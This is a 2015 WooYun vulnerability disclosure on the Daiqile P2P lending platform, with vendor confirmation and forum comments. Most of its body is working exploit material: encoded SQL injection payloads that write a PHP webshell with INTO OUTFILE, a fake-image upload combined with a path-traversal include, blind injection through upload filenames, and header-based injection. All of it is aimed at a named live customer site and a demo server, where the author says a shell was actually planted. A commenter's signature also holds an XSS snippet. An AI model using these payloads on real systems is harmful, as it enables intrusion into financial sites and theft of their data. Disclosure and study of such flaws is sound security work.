当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136418

漏洞标题:贷齐乐某5处注入&&两处getshell

相关厂商:chinaanhe.com

漏洞作者: ′雨。

提交时间:2015-08-24 09:57

修复时间:2015-11-22 14:38

公开时间:2015-11-22 14:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-24: 细节已通知厂商并且等待厂商处理中
2015-08-24: 厂商已经确认,细节仅向厂商公开
2015-08-27: 细节向第三方安全合作伙伴开放
2015-10-18: 细节向核心白帽子及相关领域专家公开
2015-10-28: 细节向普通白帽子公开
2015-11-07: 细节向实习白帽子公开
2015-11-22: 细节向公众公开

简要描述:

部分无需登录、
以你们引以为傲的案例来测试。

详细说明:

增加了全局的过滤 和 addslashes,比较6 但是呢?
用你们引以为傲的宁波贷来测试。
0x01 注入1
在index.php中

elseif ($_G['query_site'] == "integral" || strstr($_G['query_site'],'integral')){
	include_once ("modules/integral/integral_mall.php");
	//$magic->display("integral.html");
	exit;
}


来看看这个小宝贝文件里的代码

elseif ($_U['query_class'] == 'check_email'){
		$email = urldecode($_REQUEST['email']);
		$sql = "select * from {user} where email='{$email}'";
		$result = $mysql->db_fetch_array($sql);
	
		if ($result == false){
			echo true;exit;
		}else{
			echo false;exit;
		}
	}


巧妙的解码,然后带入,我喜欢。
www.nbdai0574.com
POST:query_site=integral&q=action/check_email&email=%2527
提示:MySQL错误信息:参数非法!
如何注入呢 直接POST以下包 直接写shell。
query_site=integral&q=action/check_email&email=%25%32%37%25%32%30%25%36%31%25%36%45%25%36%34%25%32%30%25%33%30%25%32%30%25%35%35%25%34%45%25%34%39%25%34%46%25%34%45%25%32%30%25%35%33%25%34%35%25%34%43%25%34%35%25%34%33%25%35%34%25%32%30%25%33%30%25%37%38%25%33%33%25%34%33%25%33%33%25%34%36%25%33%37%25%33%30%25%33%36%25%33%38%25%33%37%25%33%30%25%33%32%25%33%30%25%33%36%25%33%31%25%33%37%25%33%32%25%33%37%25%33%32%25%33%36%25%33%31%25%33%37%25%33%39%25%33%35%25%34%36%25%33%36%25%34%34%25%33%36%25%33%31%25%33%37%25%33%30%25%33%32%25%33%38%25%33%32%25%33%32%25%33%36%25%33%31%25%33%37%25%33%33%25%33%37%25%33%33%25%33%36%25%33%35%25%33%37%25%33%32%25%33%37%25%33%34%25%33%32%25%33%32%25%33%32%25%34%33%25%33%32%25%33%38%25%33%36%25%33%31%25%33%37%25%33%32%25%33%37%25%33%32%25%33%36%25%33%31%25%33%37%25%33%39%25%33%32%25%33%39%25%33%32%25%33%34%25%33%35%25%34%36%25%33%35%25%33%32%25%33%34%25%33%35%25%33%35%25%33%31%25%33%35%25%33%35%25%33%34%25%33%35%25%33%35%25%33%33%25%33%35%25%33%34%25%33%35%25%34%32%25%33%32%25%33%37%25%33%37%25%33%39%25%33%37%25%33%35%25%33%32%25%33%37%25%33%35%25%34%34%25%33%32%25%33%39%25%33%33%25%34%32%25%33%33%25%34%36%25%33%33%25%34%35%25%32%43%25%33%32%25%32%43%25%33%33%25%32%43%25%33%34%25%32%43%25%33%35%25%32%43%25%33%36%25%32%43%25%33%37%25%32%43%25%33%38%25%32%43%25%33%39%25%32%43%25%33%31%25%33%30%25%32%43%25%33%31%25%33%31%25%32%43%25%33%31%25%33%32%25%32%43%25%33%31%25%33%33%25%32%43%25%33%31%25%33%34%25%32%43%25%33%31%25%33%35%25%32%43%25%33%31%25%33%36%25%32%43%25%33%31%25%33%37%25%32%43%25%33%31%25%33%38%25%32%43%25%33%31%25%33%39%25%32%43%25%33%32%25%33%30%25%32%43%25%33%32%25%33%31%25%32%43%25%33%32%25%33%32%25%32%43%25%33%32%25%33%33%25%32%43%25%33%32%25%33%34%25%32%43%25%33%32%25%33%35%25%32%43%25%33%32%25%33%36%25%32%43%25%33%32%25%33%37%25%32%43%25%33%32%25%33%38%25%32%43%25%33%32%25%33%39%25%32%43%25%33%33%25%33%30%25%32%43%25%33%33%25%33%31%25%32%43%25%33%33%25%33%32%25%32%43%25%33%33%25%33%33%25%32%43%25%33%33%25%33%34%25%32%43%25%33%33%25%33%35%25%32%43%25%33%33%25%33%36%25%32%43%25%33%33%25%33%37%25%32%43%25%33%33%25%33%38%25%32%43%25%33%33%25%33%39%25%32%43%25%33%34%25%33%30%25%32%43%25%33%34%25%33%31%25%32%43%25%33%34%25%33%32%25%32%43%25%33%34%25%33%33%25%32%43%25%33%34%25%33%34%25%32%43%25%33%34%25%33%35%25%32%43%25%33%34%25%33%36%25%32%43%25%33%34%25%33%37%25%32%43%25%33%34%25%33%38%25%32%43%25%33%34%25%33%39%25%32%43%25%33%35%25%33%30%25%32%43%25%33%35%25%33%31%25%32%43%25%33%35%25%33%32%25%32%43%25%33%35%25%33%33%25%32%30%25%36%39%25%36%45%25%37%34%25%36%46%25%32%30%25%36%46%25%37%35%25%37%34%25%36%36%25%36%39%25%36%43%25%36%35%25%32%30%25%32%37%25%32%46%25%37%35%25%37%33%25%37%32%25%32%46%25%37%33%25%36%38%25%36%31%25%37%32%25%36%35%25%32%46%25%36%45%25%36%37%25%36%39%25%36%45%25%37%38%25%32%46%25%36%38%25%37%34%25%36%44%25%36%43%25%32%46%25%37%39%25%37%35%25%33%31%25%32%45%25%37%30%25%36%38%25%37%30%25%32%37%25%32%33
直接写入了yu1.php
0x02 注入2
依旧integral_mall

}else{
	//礼品兑换列表
	$data_list['page'] = $_REQUEST['page'];
	$data_list['epage'] = 20;
	$data_list['name'] = isset($_REQUEST['name'])?$_REQUEST['name']:"";
	$data_list['price'] = empty($_REQUEST['price'])?'':$_REQUEST['price'];
	$data_list['type'] = empty($_REQUEST['type'])?'':$_REQUEST['type'];
	$data_list['order'] = empty($_REQUEST['order'])?'':$_REQUEST['order'];
	$data_list['k'] = empty($_REQUEST['k'])?'':urldecode($_REQUEST['k']);
	$_A['product_k'] = $data_list['k'];
	if(empty($data_list['order'])){
		$_A['default_order'] = 1;
		$_A['inte_order'] = 1;
		$_A['time_order'] = 1;
		$_A['order_type'] = 'default';
	}else{
		$_order_arr = explode(',',$data_list['order']);
		switch($_order_arr[0]){
			case 'default':
				if($_order_arr[1]==1){
					$_A['default_order'] = 0;
				}else{
					$_A['default_order'] = 1;
				}
				$_A['inte_order'] = 0;
				$_A['time_order'] = 0;
				$_A['order_type'] = 'default';
    			break;
    		case 'time':
				if($_order_arr[1]==1){
					$_A['time_order'] = 0;
				}else{
					$_A['time_order'] = 1;
				}
				$_A['default_order'] = 0;
				$_A['inte_order'] = 0;
				$_A['order_type'] = 'time';
    			break;
    		case 'inte':
				if($_order_arr[1]==1){
					$_A['inte_order'] = 0;
				}else{
					$_A['inte_order'] = 1;
				}
				$_A['default_order'] = 0;
				$_A['time_order'] = 0;
				$_A['order_type'] = 'inte';
    			break;
    	}
		$_A['product_order'] = $data_list['order'];
	}
	if(!empty($_REQUEST['price'])){
		$_A['product_price'] = $_REQUEST['price'];
	}
	if(!empty($_REQUEST['type'])){
		$_A['product_type'] = $_REQUEST['type'];
	}
	$result = integralClass::GetList($data_list);


当检测不存在product的时候进入。
又看到美丽的解码 我喜欢。
www.nbdai0574.com
POST:query_site=integral&q=action/xxx&k=%2527
注入方法如1。
0x03 Getshell 1
在modules/member/index_default中

//用户中心的管理地址
$member_url = "index.php?".$_G['query_site'];
$_U['member_url'] = $member_url;
//模块,分页,每页显示条数
$_U['page'] = empty($_REQUEST['page'])?"1":$_REQUEST['page'];//分页
$_U['epage'] = empty($_REQUEST['epage'])?"10":$_REQUEST['epage'];//分页的每一页
//对地址栏进行归类
$q = empty($_REQUEST['q'])?"":urldecode($_REQUEST['q']);//获取内容 解码
$_q = explode("/",$q);
$_U['query'] = $q;
$_U['query_sort'] = empty($_q[0])?"main":$_q[0];
$_U['query_class'] = empty($_q[1])?"list":$_q[1];//注意这里
$_U['query_type'] = empty($_q[2])?"list":$_q[2];
$_U['query_url'] = $_U['member_url']."&q={$_U['query_sort']}/{$_U['query_class']}";
 $_U['user_reg_key'] = "asdfaswerwer";


继续往下看 

}elseif ($_U['query_sort'] == "code"){	
	if  (!isset($_G['user_id']) || $_G['user_id']==""){
			header('location:index.php?user&q=action/login');
	}
	
	if (is_file(ROOT_PATH."/modules/{$_U['query_class']}/{$_U['query_class']}.inc.php")){
		include(ROOT_PATH."/modules/{$_U['query_class']}/{$_U['query_class']}.inc.php");
	}else{
		$msg = array("您操作有误,请勿乱操作");
	}


包含了。 但是在上面是 $_q = explode("/",$q);
用/ 来切割成数组, 所以我们如果要向上跳目录的话,就只有用..\了
这个好像是只有windows支持?因为解码了,所以无视gpc 受php版本限
所以我们找个windows的daiqile
直接用demo的来测试。
121.40.166.230:10025
首先我们先找个上传图片的地方
上传一个图片的phpinfo

POST /plugins/editor/sinaeditor/editor/upload.php?action=upload HTTP/1.1
Host: 121.40.166.230:10025
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: uchome_auth=3838UNlcYHqf9iB3IPbJz1s5PGZ0svPTcikiYKRylegS37m7en4wgaGw0QY%2BUoNGpacjkaJAzePH8ClrW4EJ;
Content-Type: multipart/form-data; boundary=---------------------------2995119424827
Content-Length: 202
-----------------------------2995119424827
Content-Disposition: form-data; name="file1"; filename="a.jpg"
Content-Type: image/jpeg
<?php phpinfo();?>
-----------------------------2995119424827--


返回 <script>window.parent.LoadIMG('../../../data/upfiles/201508231440326040.jpg');</script>
http://121.40.166.230:10025/data/upfiles/201508231440326040.jpg
然后来包含这个文件。
http://121.40.166.230:10025/?user 首先登录会员 xiaoyu xiaoyu
再来包含
虽然全局转义了 但是利用二次编码绕过
http://121.40.166.230:10025/?user
POST:q=code/%25%32%45%25%32%45%25%35%43%25%36%34%25%36%31%25%37%34%25%36%31%25%35%43%25%37%35%25%37%30%25%36%36%25%36%39%25%36%43%25%36%35%25%37%33%25%35%43%25%33%32%25%33%30%25%33%31%25%33%35%25%33%30%25%33%38%25%33%32%25%33%33%25%33%31%25%33%34%25%33%34%25%33%30%25%33%33%25%33%32%25%33%36%25%33%30%25%33%34%25%33%30%25%32%45%25%36%41%25%37%30%25%36%37%25%30%30

1 (2).jpg


成功执行了我们上传的jpg
0x04 Getshell 2
在modules\integral\integral_mall.php中

//模块,分页,每页显示条数
$_U['page'] = empty($_REQUEST['page'])?"1":$_REQUEST['page'];//分页
$_U['epage'] = empty($_REQUEST['epage'])?"10":$_REQUEST['epage'];//分页的每一页
//对地址栏进行归类
$q = empty($_REQUEST['q'])?"":urldecode($_REQUEST['q']);//获取内容
$_q = explode("/",$q);
$_U['query'] = $q;
$_U['query_sort'] = empty($_q[0])?"main":$_q[0];
$_U['query_class'] = empty($_q[1])?"list":$_q[1];
$_U['query_type'] = empty($_q[2])?"list":$_q[2];
$_U['query_url'] = $_U['member_url']."&q={$_U['query_sort']}/{$_U['query_class']}";


下面 

}elseif ($_U['query_sort'] == "code"){
	if  (!isset($_G['user_id']) || $_G['user_id']==""){
		//微信登录
		if(strstr($_SERVER['REQUEST_URI'],'/wx/') || !empty($_REQUEST['wx'])){
			header('location:index.php?user&q=action/login&wx=1');
		}else{
			header('location:index.php?user&q=action/login');
		}
	}
	
	if (is_file(ROOT_PATH."/modules/{$_U['query_class']}/{$_U['query_class']}.inc.php")){
		include(ROOT_PATH."/modules/{$_U['query_class']}/{$_U['query_class']}.inc.php");
	}else{
		$msg = array("您操作有误,请勿乱操作");
	}


跟上面那个是一样的 访问方式如上面的注入。 这个我就不多说了
0x05 注入 3
/plugins/jquery.uploadify/uploadify.php中

$save_path1 = "../../";
$save_path2 = "data/upfiles/userimg/";
$targetFolder = $save_path1 . $save_path2; // Relative to the root
//不存在就创建文件夹
createFolder($targetFolder);
$verifyToken = md5('unique_salt' . $_POST['timestamp']);//验证token   这里我们的post不提交 则token为一个固定的值
if (!empty($_FILES) && $_POST['token'] == $verifyToken) {
	$tempFile = $_FILES['Filedata']['tmp_name'];
	$targetPath = $_SERVER['DOCUMENT_ROOT'] . $targetFolder;
	$file_name = $_FILES['Filedata']['name'];
	$file_name = "pic".mktime().rand(0,999). rechinese($file_name);//获取了名字。
	
	$targetFile = $targetFolder . $file_name;
	
	// Validate the file type
	$fileTypes = array('jpg','jpeg','gif','png'); // File extensions
	
	$fileParts = pathinfo($file_name);
	
	if (in_array($fileParts['extension'],$fileTypes)) {//验证了后缀
		if(move_uploaded_file($tempFile,$targetFile)){
			$data["img"]=$save_path2.$file_name;
			$data["auctionid"]=0;
			if(isset($_POST["reloadid"])&&$_POST["reloadid"]!=="0"){
				$sql = "update `{attestation}` set `addtime` = '" . time () . "',`addip` = '" . ip_address () . "'";
				foreach ( $data as $key => $value ) {
					$sql .= ",`$key` = '$value'";
				}
				$sql.=" where id={$_POST["reloadid"]}";
			}else{
				$sql = "insert into `{attestation}` set `addtime` = '" . time () . "',`addip` = '" . ip_address () . "'";
				foreach ( $data as $key => $value ) {
					$sql .= ",`$key` = '$value'";
				}//foreach出来
			}
						
			$result=$mysql->db_query ( $sql );
			if ($result) {
				//返回插入的id
				if(isset($_POST["reloadid"])&&$_POST["reloadid"]!=="0" ){
					echo json_encode(array("id"=>$_POST["reloadid"],"filename"=>$file_name));
				}else{
					echo json_encode(array("id"=>$mysql->db_insert_id(),"filename"=>$file_name));
						
				}
			} else {


可以看到 这里虽然上传的时候限制了后缀,但是后面foreach出来 也就是在上传的时候带入了文件的名字 导致了注入。
_FILES 的 无视了这个过滤。
用你们的 www.nbdai0574.com 测试

POST /plugins/jquery.uploadify/uploadify.php HTTP/1.1
Host: www.nbdai0574.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: uchome_auth=3838UNlcYHqf9iB3IPbJz1s5PGZ0svPTcikiYKRylegS37m7en4wgaGw0QY%2BUoNGpacjkaJAzePH8ClrW4EJ;
Content-Type: multipart/form-data; boundary=---------------------------29862134505396
Content-Length: 318
-----------------------------29862134505396
Content-Disposition: form-data; name="token"
6b79a77180e9ec3a7ca351ebe54641a2
-----------------------------29862134505396
Content-Disposition: form-data; name="Filedata"; filename="a'.jpg"
Content-Type: image/jpeg
a
-----------------------------29862134505396--


HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Sun, 23 Aug 2015 03:56:41 GMT
Content-Type: text/html;charset=GB2312
Connection: keep-alive
Set-Cookie: PHPSESSID=is7r2ov3530pdou3r7fkbj4g90; path=/
Content-Length: 24
MySQL´íÎóÐÅÏ¢£º²ÎÊý·Ç·¨!



提示mysql非法了 这就是报错的标志 说明了成功引入了单引号 这个来用盲注入

POST /plugins/swfupload/upload.array.php HTTP/1.1
Host: www.nbdai0574.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: uchome_auth=3838UNlcYHqf9iB3IPbJz1s5PGZ0svPTcikiYKRylegS37m7en4wgaGw0QY%2BUoNGpacjkaJAzePH8ClrW4EJ;
Content-Type: multipart/form-data; boundary=---------------------------10383149458909
Content-Length: 376
-----------------------------10383149458909
Content-Disposition: form-data; name="token"
6b79a77180e9ec3a7ca351ebe54641a2
-----------------------------10383149458909
Content-Disposition: form-data; name="Filedata"; filename="1' or if(ascii(substr((select user()),1,1))=114,sleep(2),1)#.jpg"
Content-Type: image/jpeg
1
-----------------------------10383149458909--


当user()的第一位的ascii为114的时候则延时, 测试宁波贷114的时候成功延时
说明user()的第一位为r
0x06 注入
plugins/swfupload/upload.array.php中

$valid_chars_regex = '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
$save_path1 = "../../";
$save_path2 = "data/upfiles/litpics/";
$save_path = $save_path1 . $save_path2;
$file_name = $_FILES ["Filedata"] ["name"];
// Validate that we won't over-write an existing file
if (file_exists ( $save_path . $file_name )) {
	//HandleError ( "File with this name already exists" );
	exit ( 0 );
}
$file_name = "pic" . mktime ().rand(0,999) . rechinese ( $file_name );//只清除了一些中文名 无影响
// Validate file extension
$path_info = pathinfo ( $file_name );
$file_extension = $path_info ["extension"];//获取后缀
$is_valid_extension = false;
foreach ( $extension_whitelist as $extension ) {//验证后缀
	if (strcasecmp ( $file_extension, $extension ) == 0) {
		$is_valid_extension = true;
		break;
	}
}
if (! $is_valid_extension) {
	//HandleError ( "Invalid file extension" );
	exit ( 0 );
}
if (! @move_uploaded_file ( $_FILES ["Filedata"] ["tmp_name"], $save_path . $file_name )) {
	echo "faild!";
	exit ( 0 );
} else {
	
	// 直接用户名查询userid,目前不了解怎么
	//$sql1 = "select user_id from {user}  where username='" . $_SESSION ['username'] . "'";
	//$res1 = $mysql->db_fetch_array ( $sql1 );
	//print_r ( $res1 );
	// userid
	$data ['user_id'] = $userid;
	
	$_G ['upimg'] ['file'] = "pics";
	$_G ['upimg'] ['cut_status'] = 0;
	$_G ['upimg'] ['code'] = "attestation";
	$data ['type_id'] = 1;
	$data ['name'] = $file_name;
	
	$data ['litpic'] = $save_path2 . $file_name;
	
	$sql = "insert into `{attestation}` set `addtime` = '" . time () . "',`addip` = '" . ip_address () . "'";
	foreach ( $data as $key => $value ) {
		$sql .= ",`$key` = '$value'";
	}
	$result = $mysql->db_query ( $sql );
	
	if ($result !== true) {
		echo "failed";
	} else {
		echo "success";
	}


如果是合法的图片后缀就带入到sql当中 因为是_FILES 无视全局的全部过滤。

POST /plugins/swfupload/upload.array.php HTTP/1.1
Host: www.nbdai0574.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: uchome_auth=3838UNlcYHqf9iB3IPbJz1s5PGZ0svPTcikiYKRylegS37m7en4wgaGw0QY%2BUoNGpacjkaJAzePH8ClrW4EJ;
Content-Type: multipart/form-data; boundary=---------------------------29862134505396
Content-Length: 318
-----------------------------29862134505396
Content-Disposition: form-data; name="token"
6b79a77180e9ec3a7ca351ebe54641a2
-----------------------------29862134505396
Content-Disposition: form-data; name="Filedata"; filename="a'.jpg"
Content-Type: image/jpeg
a
-----------------------------29862134505396--


提交后返回 提示:MySQL错误信息:参数非法!
说明成功引入了单引号。 注入方法如0X05 不多说
0x07 通用函数造成的一大堆注入

function ip_address() {
	if(!empty($_SERVER["HTTP_CLIENT_IP"])) {
		$ip_address = $_SERVER["HTTP_CLIENT_IP"];
	}else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"])){
		$ip_address = array_pop(explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']));
	}else if(!empty($_SERVER["REMOTE_ADDR"])){
		$ip_address = $_SERVER["REMOTE_ADDR"];
	}else{
		$ip_address = '';
	}
	return $ip_address;
}


很古老的xff漏洞, 但是xff中的逗号用来切割了, 这用我们用Clientip
这个通用函数造成了一大堆注入。。
随便列举几处

POST /plugins/swfupload/upload.array.php HTTP/1.1
Host: www.nbdai0574.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
x-forwarded-for:
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: uchome_auth=3838UNlcYHqf9iB3IPbJz1s5PGZ0svPTcikiYKRylegS37m7en4wgaGw0QY%2BUoNGpacjkaJAzePH8ClrW4EJ;
Content-Type: multipart/form-data; boundary=---------------------------10383149458909
Content-Length: 339
-----------------------------10383149458909
Content-Disposition: form-data; name="token"
6b79a77180e9ec3a7ca351ebe54641a2
-----------------------------10383149458909
Content-Disposition: form-data; name="Filedata"; filename="8_3M[__GP4JQURNQG0JXX0S.jpg"
Content-Type: image/jpeg
1
-----------------------------10383149458909--


返回success
更改xff为1' select from 就报错了。。

1 (3).jpg


不多说了 xff这个 很多处。
注入方法也如0x05

漏洞证明:

1 (4).jpg


利用注入写的shell 刚上的。

修复方案:

该继续转义的就转义
验证合法

版权声明:转载请注明来源 ′雨。@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-08-24 14:36

厂商回复:

谢谢

最新状态:

暂无

漏洞评价:

评论

  1. 2015-08-24 10:08 | DloveJ ( 普通白帽子 | Rank:1159 漏洞数:208 | <a href=javascrip:alert('xss')>s</a> 点...)

    我擦,前排!!!

  2. 2015-08-24 10:08 | 玉林嘎 ( 普通白帽子 | Rank:798 漏洞数:99 )

    已跪

  3. 2015-08-24 10:11 | xy0er ( 实习白帽子 | Rank:42 漏洞数:8 | x)

    叼叼啊。

  4. 2015-08-24 10:12 | qhwlpg ( 普通白帽子 | Rank:245 漏洞数:63 | 潜心代码审计。)

    跪了

  5. 2015-08-24 10:15 | DNS ( 普通白帽子 | Rank:455 漏洞数:53 | 猜猜我是谁?)

    又打脸,都说了大屁股啊

  6. 2015-08-24 10:22 | missy ( 普通白帽子 | Rank:719 漏洞数:201 | .....-3-3-3-3-3-3-3-3-3-3-3-3-3)

    幸福啪啪啪。

  7. 2015-08-24 10:23 | 继续沉默 ( 实习白帽子 | Rank:62 漏洞数:9 | 好好学习,天天向上)

    又打脸,这个厂商真是作死

  8. 2015-08-24 10:31 | 大师兄 ( 路人 | Rank:14 漏洞数:6 | 每日必关注乌云)

    雨神又开撸了

  9. 2015-08-24 11:14 | M4sk ( 普通白帽子 | Rank:1213 漏洞数:321 | 国内信息安全任重而道远,还需要厂商和白帽...)

    雨神又开撸了

  10. 2015-08-24 11:44 | scanf ( 核心白帽子 | Rank:1317 漏洞数:191 | 。)

    又是rmb

  11. 2015-08-24 13:37 | Tr0jan ( 路人 | Rank:7 漏洞数:3 | 关注网络安全)

    V2015.8.10 我们邀请了国内著名的白帽团队高压测试,久经考验,然依然毫发无损,让白帽团队也不断点赞!更是凭借自身的实力获得了众多的客户好评,我们客户之中过亿元交易额的有数十家,这是最好的证明。希望使用正版贷齐乐系统的客户一如既往的支持我们,同时,也希望使用贷齐乐盗版的客户,希望你们远离盗版,尽快更换贷齐乐正版系统,否则你们将受到黑客的侵扰,再请求我们到时就晚了,损失的可不是仅仅一套系统的价格这样简单,失去的更是客户的人心。与此同时,我们也保留了我们起诉使用贷齐乐盗版系统客户的权利。V2015.8.10版贷齐乐依然是高性能、高抗压,超出意外的体验,全方位安全防御无死角,屏蔽了常规的sql、注入、上传、跨站、弱口令,同时有定时巡航检测体系,防木马、防黑客。贷齐乐作为网贷系统行业的“领头羊”,贷齐乐人甘愿为我们的客户做“嫁衣”。最后,请客户在选择系统的时候,一定要擦亮眼睛,不要被盗版蒙骗,选择正版系统!使用盗版系统的客户最终也将自食其果,终伤害的是自己。同时,也警告以某蒙为代表的竞争对手,恶意借黑客攻击盗版贷齐乐系统,恶意诋毁行业霸主贷齐乐正版客户的行为,以贷齐乐之名气来炒作自己的行为、非正常营销和诬蔑行为,我们已经安排律师团对对其进行公诉。

  12. 2015-08-24 13:50 | tzwx ( 路人 | Rank:2 漏洞数:1 | 吴邪仍在,不见天真)

    看个热闹

  13. 2015-08-24 14:50 | 爱神 ( 路人 | Rank:4 漏洞数:1 | Qq190290957)

    @Tr0jan 打脸。

  14. 2015-08-24 15:23 | 牛肉包子 ( 普通白帽子 | Rank:254 漏洞数:64 )

    @疯狗 狗哥求审核 http://www.wooyun.org/bugs/wooyun-2015-0135577/trace/ff0fc16d321e35452b8216ff77bd0acc

  15. 2015-11-17 16:35 | _Thorns ( 普通白帽子 | Rank:1056 漏洞数:184 | WooYun is the Bigest gay place :))

    看完以后,受益匪浅.,楼主666